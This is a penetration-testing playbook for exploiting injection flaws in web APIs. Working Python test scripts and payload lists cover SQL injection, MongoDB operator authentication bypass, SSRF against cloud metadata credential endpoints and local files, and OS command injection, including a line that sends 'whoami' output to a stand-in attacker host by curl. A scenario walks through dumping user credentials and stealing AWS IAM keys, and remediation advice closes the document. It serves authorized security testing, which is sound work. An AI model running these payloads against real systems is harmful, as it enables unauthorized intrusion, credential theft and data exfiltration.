Exploiting API Injection Vulnerabilities
When to Use
- Testing API endpoints that accept user input for database queries, system commands, or external requests
- Assessing APIs that interact with SQL databases, NoSQL stores (MongoDB, Redis), LDAP directories, or external URLs
- Evaluating input validation and parameterized query usage across all API endpoints
- Testing for SSRF where API parameters accept URLs or hostnames that trigger server-side requests
- Identifying injection points in headers, path parameters, query strings, and JSON/XML request bodies
Do not use without written authorization. Injection testing can modify or destroy data and compromise backend systems.
Prerequisites
- Written authorization specifying target API and backend systems in scope
- Python 3.10+ with
requestslibrary - SQLMap for automated SQL injection detection and exploitation
- Burp Suite Professional with Active Scan capabilities
- Knowledge of the backend database technology (MySQL, PostgreSQL, MongoDB, Redis)
- Isolated test environment to avoid production data corruption
Workflow
Step 1: Injection Point Identification
import requests
import json
import urllib.parse
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
# Map all input points across the API
injection_points = [
# Path parameters
{"type": "path", "method": "GET", "url": "/users/{input}"},
{"type": "path", "method": "GET", "url": "/products/{input}"},
{"type": "path", "method": "GET", "url": "/orders/{input}"},
# Query parameters
{"type": "query", "method": "GET", "url": "/users?search={input}"},
{"type": "query", "method": "GET", "url": "/products?sort={input}&order={input}"},
{"type": "query", "method": "GET", "url": "/products?category={input}"},
{"type": "query", "method": "GET", "url": "/search?q={input}"},
# JSON body parameters
{"type": "body", "method": "POST", "url": "/auth/login", "fields": ["username", "password"]},
{"type": "body", "method": "POST", "url": "/users", "fields": ["name", "email"]},
{"type": "body", "method": "POST", "url": "/search", "fields": ["query", "filters"]},
{"type": "body", "method": "POST", "url": "/webhook", "fields": ["url", "callback_url"]},
# Header parameters
{"type": "header", "method": "GET", "url": "/users/me", "headers": ["X-Forwarded-For", "Referer", "User-Agent"]},
]
Step 2: SQL Injection Testing
# SQL injection payloads for different contexts
SQL_PAYLOADS = {
"detection": [
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"1 OR 1=1",
"' OR 1=1--",
"' UNION SELECT NULL--",
"1; WAITFOR DELAY '0:0:5'--",
"1' AND SLEEP(5)--",
"1)) OR 1=1--",
],
"union_based": [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,2,3--",
"' UNION SELECT username,password,NULL FROM users--",
"-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
],
"error_based": [
"' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
],
"time_based": [
"' AND SLEEP(5)--",
"'; WAITFOR DELAY '0:0:5'--",
"' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"1; SELECT pg_sleep(5)--",
],
}
import time
def test_sql_injection(endpoint, param_name, param_type="query"):
"""Test a parameter for SQL injection."""
results = []
for category, payloads in SQL_PAYLOADS.items():
for payload in payloads:
start = time.time()
if param_type == "query":
url = f"{BASE_URL}{endpoint}"
resp = requests.get(url, headers=headers,
params={param_name: payload}, timeout=15)
elif param_type == "body":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={param_name: payload}, timeout=15)
elif param_type == "path":
url = f"{BASE_URL}{endpoint.replace('{input}', urllib.parse.quote(payload))}"
resp = requests.get(url, headers=headers, timeout=15)
elapsed = time.time() - start
# Check for SQL injection indicators
indicators = {
"error": any(kw in resp.text.lower() for kw in [
"sql syntax", "mysql", "postgresql", "sqlite",
"oracle", "unterminated", "syntax error",
"unexpected end", "quoted string", "invalid input"
]),
"time_based": elapsed > 4.5 and "SLEEP" in payload.upper(),
"union_data": resp.status_code == 200 and len(resp.text) > 0
and "UNION" in payload.upper()
and resp.text != requests.get(f"{BASE_URL}{endpoint}",
headers=headers, params={param_name: "test"}).text,
}
if any(indicators.values()):
triggered = [k for k, v in indicators.items() if v]
results.append({
"endpoint": endpoint,
"param": param_name,
"category": category,
"payload": payload,
"indicators": triggered,
"status": resp.status_code,
"time": f"{elapsed:.1f}s"
})
print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")
return results
# Test search parameter
test_sql_injection("/search", "q", "query")
test_sql_injection("/products", "category", "query")
test_sql_injection("/auth/login", "username", "body")
Step 3: NoSQL Injection Testing
# NoSQL injection payloads (MongoDB-focused)
NOSQL_PAYLOADS = {
"auth_bypass": [
# MongoDB operator injection in JSON body
{"username": {"$ne": ""}, "password": {"$ne": ""}},
{"username": {"$gt": ""}, "password": {"$gt": ""}},
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
{"username": "admin", "password": {"$ne": "wrongpassword"}},
{"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
],
"data_extraction": [
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}, # Enumerate first char
{"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
],
"operator_injection_string": [
# When input is a string field
'{"$gt": ""}',
'{"$ne": null}',
'{"$regex": ".*"}',
'{"$where": "1==1"}',
],
}
def test_nosql_injection(endpoint, method="POST"):
"""Test for MongoDB NoSQL injection."""
results = []
# Test JSON body operator injection
for category, payloads in NOSQL_PAYLOADS.items():
for payload in payloads:
if isinstance(payload, dict):
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers, json=payload, timeout=10)
else:
# Test as string parameter
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={"username": json.loads(payload), "password": "test"},
timeout=10)
if resp.status_code == 200:
resp_data = resp.json() if resp.text else {}
if "token" in str(resp_data) or "user" in str(resp_data):
results.append({
"endpoint": endpoint,
"category": category,
"payload": str(payload)[:100],
"authenticated": True,
"response": str(resp_data)[:200]
})
print(f"[NoSQLi] {endpoint}: {category} - Auth bypass successful")
return results
nosql_results = test_nosql_injection("/auth/login")
Step 4: Server-Side Request Forgery (SSRF) Testing
# SSRF payloads targeting internal services
SSRF_PAYLOADS = {
"cloud_metadata": [
"http://169.254.169.254/latest/meta-data/", # AWS IMDS
"http://169.254.169.254/latest/meta-data/iam/security-credentials/", # AWS IAM creds
"http://metadata.google.internal/computeMetadata/v1/", # GCP
"http://169.254.169.254/metadata/instance?api-version=2021-02-01", # Azure
],
"internal_services": [
"http://localhost:8080/",
"http://127.0.0.1:6379/", # Redis
"http://127.0.0.1:9200/", # Elasticsearch
"http://127.0.0.1:27017/", # MongoDB
"http://internal-api.local:8080/",
"http://10.0.0.1/admin/",
],
"protocol_smuggling": [
"gopher://127.0.0.1:6379/_SET%20pwned%20true",
"file:///etc/passwd",
"dict://127.0.0.1:6379/INFO",
],
"bypass_filters": [
"http://0x7f000001/", # Hex IP for 127.0.0.1
"http://2130706433/", # Decimal IP for 127.0.0.1
"http://0177.0.0.1/", # Octal
"http://127.0.0.1.nip.io/", # DNS rebinding
"http://[::1]/", # IPv6 localhost
"http://127.1/", # Shortened IP
"http://0/", # Zero
],
}
def test_ssrf(endpoint, url_param, method="POST"):
"""Test for SSRF in URL-accepting parameters."""
results = []
for category, payloads in SSRF_PAYLOADS.items():
for payload in payloads:
try:
if method == "POST":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={url_param: payload}, timeout=10)
else:
resp = requests.get(f"{BASE_URL}{endpoint}",
headers=headers,
params={url_param: payload}, timeout=10)
# Check for SSRF indicators
if resp.status_code == 200 and len(resp.text) > 50:
# Check for cloud metadata
if any(kw in resp.text for kw in ["ami-id", "instance-id",
"iam", "AccessKeyId",
"root:x:", "computeMetadata"]):
results.append({
"endpoint": endpoint,
"category": category,
"payload": payload,
"severity": "critical",
"data": resp.text[:300]
})
print(f"[SSRF-CRITICAL] {endpoint}: {category} - {payload}")
else:
results.append({
"endpoint": endpoint,
"category": category,
"payload": payload,
"severity": "high",
"data": resp.text[:100]
})
print(f"[SSRF] {endpoint}: {category} - {payload} -> {resp.status_code}")
except requests.exceptions.RequestException:
pass
return results
# Test endpoints that accept URLs
ssrf_results = test_ssrf("/webhook/test", "url")
ssrf_results.extend(test_ssrf("/import", "source_url"))
ssrf_results.extend(test_ssrf("/proxy", "target", "GET"))
Step 5: OS Command Injection Testing
# Command injection payloads
CMD_PAYLOADS = {
"detection": [
"; sleep 5",
"| sleep 5",
"` sleep 5 `",
"$( sleep 5 )",
"\n sleep 5",
"& ping -c 5 127.0.0.1 &",
],
"data_exfil": [
"; cat /etc/passwd",
"| id",
"`whoami`",
"$(uname -a)",
"; curl http://attacker-controlled-server.com/$(whoami)",
],
"windows": [
"& ping -n 5 127.0.0.1 &",
"| dir",
"; type C:\\Windows\\System32\\drivers\\etc\\hosts",
"& timeout /t 5 &",
],
}
def test_command_injection(endpoint, param_name, param_type="body"):
"""Test for OS command injection."""
results = []
for category, payloads in CMD_PAYLOADS.items():
for payload in payloads:
start = time.time()
prefixed_payload = f"validvalue{payload}"
if param_type == "body":
resp = requests.post(f"{BASE_URL}{endpoint}",
headers=headers,
json={param_name: prefixed_payload}, timeout=15)
else:
resp = requests.get(f"{BASE_URL}{endpoint}",
headers=headers,
params={param_name: prefixed_payload}, timeout=15)
elapsed = time.time() - start
indicators = {
"time_based": elapsed > 4.5 and "sleep" in payload.lower(),
"output": any(kw in resp.text for kw in [
"root:", "uid=", "Linux", "Windows", "bin/bash",
"Directory of", "Volume Serial"
]),
}
if any(indicators.values()):
results.append({
"endpoint": endpoint,
"param": param_name,
"category": category,
"payload": payload,
"indicators": [k for k, v in indicators.items() if v],
})
print(f"[CMDi] {endpoint} ({param_name}): {payload}")
return results
# Test file processing and system interaction endpoints
test_command_injection("/export", "filename")
test_command_injection("/convert", "input_file")
test_command_injection("/ping", "host", "query")
Key Concepts
| Term | Definition |
|---|---|
| SQL Injection | Inserting SQL code into API parameters that are concatenated into database queries, enabling data extraction or modification |
| NoSQL Injection | Injecting NoSQL operators ($ne, $gt, $regex) into MongoDB queries or manipulating Redis/Elasticsearch queries through API parameters |
| SSRF | Server-Side Request Forgery (OWASP API7:2023) - forcing the server to make HTTP requests to attacker-specified destinations including internal services |
| Command Injection | Injecting OS commands through API parameters that are passed to shell execution functions (exec, system, popen) |
| Parameterized Queries | Using prepared statements with bound parameters to prevent SQL injection by separating code from data |
| Input Validation | Server-side verification that user input conforms to expected format, type, length, and character set before processing |
Tools & Systems
- SQLMap: Automated SQL injection detection and exploitation tool supporting all major database types
- Burp Suite Professional: Active scanner with injection detection for SQL, NoSQL, SSRF, and command injection
- NoSQLMap: Automated NoSQL injection detection and exploitation tool focused on MongoDB
- SSRFmap: SSRF detection and exploitation framework with cloud metadata extraction modules
- Commix: Automated OS command injection detection and exploitation tool
Common Scenarios
Scenario: E-Commerce API Injection Assessment
Context: An e-commerce API uses PostgreSQL for the product catalog, MongoDB for user sessions, and accepts webhook URLs for order notifications. The API is built with Node.js/Express.
Approach:
- Test product search endpoint
GET /api/v1/products?search=testwith SQL payloads - discover error-based SQLi revealing PostgreSQL 14 backend - Exploit union-based SQLi to extract all table names, then dump user credentials from the
userstable - Test login endpoint with NoSQL operators -
{"username":{"$ne":""},"password":{"$ne":""}}bypasses authentication - Test webhook URL endpoint for SSRF -
POST /api/v1/webhooks {"url":"http://169.254.169.254/latest/meta-data/"}returns AWS instance metadata - Extract AWS IAM role credentials via SSRF, gaining access to S3 buckets containing customer data
- Test file export endpoint for command injection -
GET /api/v1/export?filename=report;cat /etc/passwdreturns passwd file contents
Pitfalls:
- Only testing SQL injection when the backend uses multiple data stores (SQL, NoSQL, Redis, Elasticsearch)
- Missing injection points in HTTP headers (User-Agent, Referer, X-Forwarded-For) that may be logged to SQL databases
- Not testing SSRF bypass techniques when the initial payload is blocked by URL validation
- Assuming JSON API bodies are safe from SQL injection (JSON values are still concatenated into queries)
- Not testing time-based injection when error messages are suppressed
Output Format
## Finding: SQL Injection in Product Search API Enables Full Database Access
**ID**: API-INJ-001
**Severity**: Critical (CVSS 9.8)
**OWASP API**: API8:2023 - Security Misconfiguration / Injection
**Affected Endpoints**:
- GET /api/v1/products?search= (SQL injection)
- POST /api/v1/auth/login (NoSQL injection)
- POST /api/v1/webhooks (SSRF)
**Description**:
The product search API concatenates user input directly into a PostgreSQL
query without parameterization. An attacker can extract all database
contents including user credentials, payment information, and admin
secrets. Additionally, the login endpoint is vulnerable to MongoDB
NoSQL operator injection, and the webhook endpoint allows SSRF to
internal services and cloud metadata.
**Impact**:
- Full database read/write access via SQL injection
- Authentication bypass via NoSQL operator injection
- AWS IAM credential theft via SSRF to instance metadata
- Potential remote code execution via SQL injection stacked queries
**Remediation**:
1. Use parameterized queries for all database operations
2. Validate and sanitize NoSQL operator characters in JSON input
3. Implement URL allowlisting for webhook and callback URLs
4. Block access to cloud metadata endpoints (169.254.169.254) from application servers
5. Use an ORM with parameterized queries and disable raw query methods
6. Implement WAF rules for common injection patterns as defense in depth